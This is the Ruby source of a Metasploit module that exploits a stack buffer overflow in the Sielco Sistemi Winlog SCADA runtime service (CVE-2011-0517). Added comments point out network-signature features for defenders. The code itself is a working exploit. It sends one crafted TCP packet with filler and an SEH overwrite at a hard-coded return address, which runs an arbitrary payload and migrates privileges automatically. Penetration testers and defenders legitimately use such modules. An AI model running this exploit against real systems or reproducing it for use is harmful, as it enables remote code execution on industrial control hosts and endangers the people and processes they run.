GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/winlog_runtime.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit remote exploit module for the Sielco Sistemi Winlog "Runtime.exe"
# service (CVE-2011-0517). The metadata below gives the affected range as
# Winlog <= 2.07.00; the only target carries a hard-coded return address for
# "Winlog Lite 2.07.00", so other builds are not covered by this module.
#
# Defender notes:
#   - The trigger is one TCP message to the service port (RPORT, default 46823,
#     registered in #initialize) whose layout is fixed by #exploit: a one-byte
#     0x02 opcode, a big-endian 0x0101, a long run of uppercase ASCII filler,
#     then the SEH record and payload. That shape is what a network signature
#     would key on; NOTE(review): nothing in this file shows what legitimate
#     Winlog traffic looks like, so validate any rule against real traffic.
#   - The vendor advisory and CISA ICSA-11-017-02 listed under 'References'
#     are the sources for the fix; this file does not name a patched version.
class MetasploitModule < Msf::Exploit::Remote
  # Ranking the framework uses when ordering / auto-selecting modules.
  Rank = GreatRanking

  # Raw TCP client helpers (connect, sock, disconnect) and the SEH-overwrite
  # helper (generate_seh_payload). Both are framework mixins, not defined here.
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Registers module metadata and the single module-specific option (RPORT).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sielco Sistemi Winlog Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in Sielco
          Sistem Winlog <= 2.07.00. When sending a specially formatted
          packet to the Runtime.exe service, an attacker may be able to
          execute arbitrary code.
        },
        'Author' => [ 'Luigi Auriemma', 'MC' ],
        'License' => MSF_LICENSE,
        # Public identifiers and advisories for the underlying bug.
        'References' => [
          [ 'CVE', '2011-0517' ],
          [ 'OSVDB', '70418'],
          [ 'URL', 'http://aluigi.org/adv/winlog_1-adv.txt' ],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-017-02']
        ],
        # Code execution is not claimed to be privileged.
        'Privileged' => false,
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          # Presumably runs the priv_migrate post module once a session opens;
          # the script itself is not part of this file.
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        'Payload' => {
          # Bytes available for the encoded payload after the SEH frame.
          'Space' => 450,
          # Bytes that must not appear in the payload: NUL, space, LF, CR.
          'BadChars' => "\x00\x20\x0a\x0d",
          # Framework-inserted stack pointer adjustment before the payload runs.
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        # 'Ret' is the address passed to generate_seh_payload in #exploit; it is
        # hard-coded for this one build, hence the single target entry.
        'Targets' => [
          [ 'Winlog Lite 2.07.00', { 'Ret' => 0x011946de } ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2011-01-13',
        # Left at the UNKNOWN_* placeholders; nothing in this file establishes
        # how the target service behaves on a failed attempt.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Only option beyond the Tcp mixin defaults: the service port.
    register_options([Opt::RPORT(46823)])
  end

  # Builds the single malformed message and sends it to the service.
  #
  # Message layout, in the order appended to `data`:
  #   1 byte    0x02      opcode
  #   2 bytes   0x0101    big-endian ('n')
  #   588 bytes           uppercase alpha filler
  #   rest                SEH record + payload from generate_seh_payload
  #
  # Side effects: opens a TCP connection (connect), writes once (sock.put),
  # runs the payload handler, then closes the connection (disconnect).
  #
  # @return [void]
  def exploit
    connect

    data = [0x02].pack('C') # opcode
    data << [0x0101].pack('n')
    # NOTE(review): 588 is presumably the distance to the SEH record; the
    # derivation is not shown in this file.
    data << rand_text_alpha_upper(588)
    data << generate_seh_payload(target.ret)

    print_status("Trying target #{target.name}...")
    sock.put(data)

    handler
    disconnect
  end
end